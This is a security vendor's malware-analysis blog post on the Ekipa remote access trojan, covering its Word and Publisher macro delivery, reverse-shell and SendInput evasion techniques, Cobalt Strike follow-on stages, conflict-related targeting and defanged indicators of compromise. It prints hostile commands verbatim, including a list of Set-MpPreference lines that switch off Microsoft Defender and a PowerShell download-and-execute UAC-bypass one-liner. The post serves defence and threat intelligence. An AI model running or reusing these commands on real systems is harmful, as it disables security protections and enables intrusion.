Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Malicious Macros Adapt to Use Microsoft Publisher to Push Ekipa RAT

After Microsoft announced this year that macros from the Internet will be blocked by default in Office, many threat actors have switched to different file types such as Windows Shortcut (LNK), ISO or ZIP files, to distribute their malware. Nevertheless, Office documents are still actively leveraged in many campaigns and pose a large risk to organizations, especially with threat actors continuously finding new ways to avoid detection.

The Trustwave SpiderLabs’ Research Team has analyzed samples of an Ekipa Remote Access Trojan (RAT) in the wild, and found interesting techniques for the use of malicious Office documents. As shown in this research, the Ekipa RAT was added to a sophisticated threat actors’ cyber arsenal and used in the Russian – Ukraine war. 

Overview of Functionalities

Ekipa is a Remote Access Trojan used for targeted attacks and can be purchased  on underground forums, as CloudSEK found in its research. The current price is set at $3,900, which is very high. The trojan leverages MS Office and Visual Basic for Applications as its main infection and operations vector. It also comes with a control panel and builders for:

  • MS Word Macros
  • XLL Excel add-ins
  • MS Publisher Macros

A Remote Access Trojan is capable of:

  • Collecting information about a targeted system (basic system information, installed AV products, GPU and CPU information and more)
  • Browsing and downloading of files on attached drives
  • Dropping files
  • Executing files and commands.

When used with malicious Word documents, the trojan’s main functions are implemented in a one-time VBA macro template. When the document is reopened, the server rejects the request to download the macro template and all subsequent requests for installation actions.


Figure 1 Ekipa RAT advertisement on the XSS forum



Figure 2Ekipa RAT is continuously updated with new features as seen in presented screenshot from the XSS forum.


Analysis of Microsoft Word Documents with Remote Template

There are multiple documents related to Ekipa RAT on popular malware analysis sites, but since the Command and Control (C2) server rejects the subsequent requests for the remote template, there are only a few available for analysis. Malwarebytes analyzed an early version of the template in July 2021 and a few samples were discovered by other researchers and posted on Twitter. The comprehensive list of samples identified by Trustwave is presented in the IOC section of this blog. In the following paragraphs we analyzed the Microsoft Word remote templates:

  • 4ee626e058e7be9e5d20f314895500c5abf34c61a15a3b9b4f90c04f88c26aad
  • E5a302c3d53851be4e09585f7462346a6f7a71b02bf38d8483f5c48e2ab845c7



The initial Microsoft Word document “Приказ №21 от 29-03-2022.docx” was observed in March 2022. Upon execution, it downloads the remote template from the URL:


This URL pattern matches URLs seen in other documents related to Ekipa RAT. They contact ‘t.php’ endpoint with parameter "t" which is the unique identifier ensuring that the remote template can be fetched only once for any given initial Word document file, and parameter “action” with “show_document” value.

The remote template executes the VBA RAT after the user decides to close the document. In the DocumentBeforeClose procedure, it cancels shutdown of the document and instead sets the Application.Visible property to False. Then it executes the main ConnectCP function.


Figure 3: DocumentBeforeClose procedure in analyzed template

Main Functionalities

In the ConnectCP routine, the malicious macro collects information about the system and stores it in a JSON format. Next, it leverages SetTimer to set up a procedure (“TimerProc”) that will execute every 2.5 seconds. The time interval value is the ‘x’ parameter in the initial URL fetching the remote template.

The timer procedure executes the function responsible for sending the initially collected data about the system to the Command-and-Control server. In response the server returns a list of tasks for the trojan to execute.



Figure 4: System information collection and exfiltration.


The RAT has nine different tasks that it can implement. These are similar to what Malwarebytes observed in its research, notably that the shellcode execution feature is missing. An interesting technique used to implement the exaction of a command is described in the following section.

Task ID



Set different timer procedure execution interval


Enumerate drives


Enumerate files and directories


Exfiltrate files or directories


Download file


Not implemented


Delete file


Copy file


Execute command

Figure 5: Tasks implemented in the VBA RAT


Commands Execution via SendInput

One of the analyzed malware capabilities is the execution of commands provided by the Command-and-Control server. For that purpose, threat actors use a technique leveraging SendInput function from USER32.DLL.


Figure 6: Beautified VBA code executing commands leveraging SendInput function.

Malicious VBA Macro synthesizes keyboard input to open ‘Run’ window and execute malicious commands. This way it evades the Parent-Child process relationships. As shown in the example below, leveraging this technique to run cmd.exe, titled ‘CMDSendInput’, opens a new console window with the explorer.exe as a parent process and not winword.exe as for the cmd.exe, titled “CMDCallShell” opened via classic “Call” and “Shell” Visual Basic functions.


Figure 7Example Run Window Starting Command Prompt                           



Figure 8: Process tree with executed Command Prompts



This is significant as the Parent-Child process relationships are often the basis for detection of malicious activity by security products.


Based on Creation Date analysis, this template is a later version of Ekipa RAT. As per this timestamp it was created on August 7, 2022, but it was observed in the wild around December 12, 2022. Multiple documents were submitted to Virustotal fetching this remote template, suggesting a wider campaign. All used a lure targeting Russian recipients.



Figure 9: Lure used in document OPRF.docx

URLs fetching the remote template share the same pattern as with other C2 servers. Here is an example of the link:


Functionalities of the VBA RAT in the remote template are similar to those in an earlier version analyzed in previous paragraphs. Notably, there is a new task that can be executed by the RAT which is a reverse shell. More detail on Reverse Shell Creation is presented in the next section.

Reverse Shell Creation

A new task with Task ID ‘~’ is responsible for creating a reverse shell for the attacker. It creates a ‘cmd.exe’ process with a modified StartupInfoA structure so that standard input and output is routed through two created pipes. One of them is used to send commands to Command Prompt and the second one to read the output.


Figure 10: Reverse Shell Creation implementation of Ekipa RAT


Use of Ekipa RAT In The Wild

The most recent Ekipa RAT Command and Control server identified by SpiderLabs is domain ekb[.]tanzedrom[.]ru. This C2 server quickly became inactive, and we were unable to interact with it. However, during our research we were able to communicate with the other identified C2 server, domain azure-tech[.]pro.

The server did not respond to requests fetching the remote template, but after analysis of the template observed in earlier infections and described in the previous section, we were able to interact with the server and acquire a list of tasks that were supposed to execute on an infected machine. What’s interesting is that the C2 server appeared to be geo-fenced to only allow traffic from Ukraine. Fetched tasks included the download of second stage payloads from another server and execution of two files.


Figure 11Infection flow of a sample communicating with one of the analyzed C2 servers.

The second-stage server, 146.70.87[.]218, was not active at the time of the analysis, however pivoting on this IP address and URL pattern we found additional IP addresses, that we assess with high confidence to be part of the same malicious infrastructure.


Figure 12: Identified malicious infrastructure and its similarities

Security Researcher @1LuminateTheNet shared directory listing 146.70.87[.]148 on Twitter. We found similar batch scripts on active server 185.246.220[.]149.


Figure 13: Directory Listing identified on one of the servers.

All batch scripts share similar patterns. {FILENAME}.bat is an encoded Powershell command. An example of which is presented in Figure 14.


Figure 14: Example encoded PowerShell command.

The decoded command consists of two parts:

  1. Obfuscated AMSI bypass oneliner:
  1. Execution of commands fetched from /load/{FILENAME} URI


Figure 15: Example decoded powerDEF.bat script.


Analysis of powerDEF.bat

Script powerDEF.bat executes a list of commands tampered with the Microsoft Defender settings presented in Figure 16.

1 Add-MpPreference -ExclusionExtension ".bat"
2 Add-MpPreference -ExclusionExtension ".exe"
3 Set-MpPreference -EnableControlledFolderAccess Disabled
4 Set-MpPreference -PUAProtection disable
5 Set-MpPreference -EnableControlledFolderAccess Disabled
6 Set-MpPreference -PUAProtection disable
7 Set-MpPreference -DisableRealtimeMonitoring $true
8 Set-MpPreference -DisableBehaviorMonitoring $true
9 Set-MpPreference -DisableBlockAtFirstSeen $true
10 Set-MpPreference -DisableIOAVProtection $true
11 Set-MpPreference -DisablePrivacyMode $true
12 Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
13 Set-MpPreference -DisableArchiveScanning $true
14 Set-MpPreference -DisableIntrusionPreventionSystem $true
15 Set-MpPreference -DisableScriptScanning $true
16 Set-MpPreference -SubmitSamplesConsent 2
17 Set-MpPreference -EnableControlledFolderAccess Disabled
18 Set-MpPreference -PUAProtection disable
19 Set-MpPreference -HighThreatDefaultAction 6 -Force
20 Set-MpPreference -ModerateThreatDefaultAction 6
21 Set-MpPreference -LowThreatDefaultAction 6
22 Set-MpPreference -SevereThreatDefaultAction 6
23 Set-MpPreference -ScanScheduleDay 8
24 Set-MpPreference -MAPSReporting 0
25 Set-MpPreference -HighThreatDefaultAction 6 -Force
26 Set-MpPreference -ModerateThreatDefaultAction 6  
27 Set-MpPreference -LowThreatDefaultAction 6
28 Set-MpPreference -SevereThreatDefaultAction 6
29 Set-MpPreference -ScanScheduleDay 8

Figure 16: List of commands tempering with Microsoft Defender settings.


Analysis of uac.bat

Script uac.bat executes 1.bat script leveraging User Account Control Bypass from GitHub: 

iex(new-object net.webclient).downloadstring('')UACBypass -noninteractive -command "C:\windows\system32\1.bat" -technique DiskCleanup


Analysis of 1.bat, 2.bat and 4.bat

Script 1.bat downloads and executes payload from http[:]//185.246.220[.]149:10443/work6, which is a PowerShell Cobalt Strike Beacon loader.



Figure 17: Example PowerShell Cobalt Strike Beacon loader


Configuration of the Beacon can be extracted using one of the scripts available on GitHub.



Figure 18: Cobalt Strike configuration extracted from one of the Beacons

Scripts 2.bat and 4.bat work analogically to 1.bat, they differ in the URL to fetch the Beacon PowerShell loader and Cobalt Strike Team Server IP address in the configuration.



All Cobalt Strike configurations shared the same watermark (206546002), which TrendMicro researchers tied to the Play and Quantum ransomware groups. Cobalt Strike beacons with this watermark were dropped by Emotet and SVCReady botnets.

The Ekipa RAT is also being used in the Russian -Ukraine Conflict. While the analyzed Command and Control server azure-tech[.]pro seemed to be geo-fenced to only allow traffic from Ukraine, other documents were used in attacks against Russia. Documents communicating with kc-3[.]ru and roskazna[.]net domains used lures targeting Russian recipients.



Figure 19: Lure used in document “Приказ №21 от 29-03-2022.docx” impersonating Federal Treasury of Russia


The Institute of Natural and Technical Systems is a Russian entity being sanctioned by the Ukrainian government. In one of their publications called “List of measures to improve the security of the organization's IT infrastructure from the Ministry of Education and Science (translation by Trustwave), they mention the roskazna[.]net domain and document with the same filename as presented above and attribute it as part of the campaign against the Russian Federation.



Figure 20: Part of the article published by Institute of Natural and Technical Systems


Trustwave identified two emails, with the aforementioned document as a malicious attachment, targeting major governmental and financial institutions in the Russian Federation. The first email was addressed to the Federal Customs Service of Russia, the second was addressed to one of the Gazprom Russia departments – main Russian natural resources extractor.



Figure 21: Emails with malicious attachment targeting the Federal Customs Service of Russia and Gazprom Russia


As shown in this research, the Ekipa RAT is actively being used to target Russian entities and individuals, which is in line with the Malwarebytes research.

Given that one of the servers appeared to be geofenced to only allow traffic from Ukraine, there is a small chance that it was used by two sides of this conflict.

It is interesting that while being sold on pro-Russian forums, Ekipa RAT is leveraged to target entities in Russia, which breaks the unwritten rule of this country’s hacker underground – don’t hack Russia.


Microsoft Publisher and XLL variants of Ekipa RAT

We did not identify samples of those EKIPA RAT variants in the wild. The IOC section includes one Excel document with embedded macros that, based on the included URL pattern, is an Ekipa RAT loader, however the C2 server was inactive during our analysis.

Both XLL Excel add ins and Publisher variants are most likely a response to Microsoft blocking macros in files downloaded from Internet. While XLL files are widely used by threat actors, Microsoft Publisher (.pub) files are a niche.

Just as with other Microsoft office products, like Excel or Word, Publisher files can contain macros that will execute upon the opening or closing the file, which makes them interesting initial attack vectors from the threat actor’s point of view. When Microsoft blocked macros from executing in files downloaded from the Internet, it did not do so for the Publisher files.19462_image038

Figure 22: Part of Microsoft’s documentation at


The user is presented with the warning but is still one click away from executing the malicious file and possibly infecting a machine. So far, Trustwave has not observed an uptick in malicious Publisher email attachments. Nevertheless, Trustwave SpiderLabs is monitoring the situation.



Figure 23: Security Notice displayed when user tries to run Publisher file with Macros downloaded from the internet



The Ekipa RAT is a great example of that how threat actors are continuously changing their techniques to stay ahead of the defenders. As shown in this research, the creators of this malware are tracking changes in the security industry, like blocking macros from the internet by Microsoft, and shifting their tactics accordingly. It is also interesting to see how sophisticated threat actors adopt these new tools into their arsenal for a better chance of completing their objectives.

Trustwave SpiderLabs would like to thank the team members who contributed supplemental findings in support of this blog.



Initial Microsoft Word Documents

Initial Document

C2 Domain






















































Microsoft Word Remote Templates




Initial Microsoft Excel Document

Initial Document

C2 Domain




In the Wild Use

146[.]70[.]87[.]218   IP addresses hosting 2nd stage payloads
hxxp://146[.]70[.]87[.]218/load/6.bat   2nd stage batch script observed in Ekipa RAT campaign
hxxp://146[.]70[.]87[.]218/load/doc.dll   2nd stage dll observed in Ekipa RAT campaign
hxxp://193[.]47[.]61[.]182/load/powerDEF.bat 9f8b39480505b822c0a34f60f0604a68 Batch script tempering with Defender settings.
hxxp://193[.]47[.]61[.]182/load/uac.bat 1c25e329b603f8b8088d7f291c308b39 Batch script with UAC bypass
hxxp://193[.]47[.]61[.]182/load/1.bat e322156d6b142647e61f22c6929a2c08 Batch scripts leading to Cobalt Strike beacon installation.
hxxp://193[.]47[.]61[.]182/load/2.bat 50433cf9c4fe37db367e9741b36b58d8  
hxxp://193[.]47[.]61[.]182/load/4.bat c236ba55a7e3513fd59d39c75356a52f  
hxxp://185[.]246[.]220[.]149:10443/work6 4ad293fe645ca18db71273771418f440 PowerShell Cobalt Strike beacons loaders
hxxp://185[.]246[.]220[.]148:10443/work5 45246a95de6022d3bd254f4e8f460436  
hxxp://85[.]208[.]136[.]130:80/work2 4896024921a0b23d84f75e845452759d  
185[.]246[.]220[.]149   Cobalt Strike team server
206546002   Cobalt Strike watermark


Latest SpiderLabs Blogs

Search & Spoof: Abuse of Windows Search to Redirect to Malware

Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware. We found the threat actors utilizing a...

Read More

The Sentinel’s Watch: Building a Security Reporting Framework

Imagine being on shift as the guard of a fortress. Your job is to identify threats as they approach the perimeter. The more methods you have for detecting those threats, the better your chances of...

Read More

Fake Advanced IP Scanner Installer Delivers Dangerous CobaltStrike Backdoor

During a recent client investigation, Trustwave SpiderLabs found a malicious version of the Advanced IP Scanner installer, which contained a backdoored DLL module. Our client had been searching for...

Read More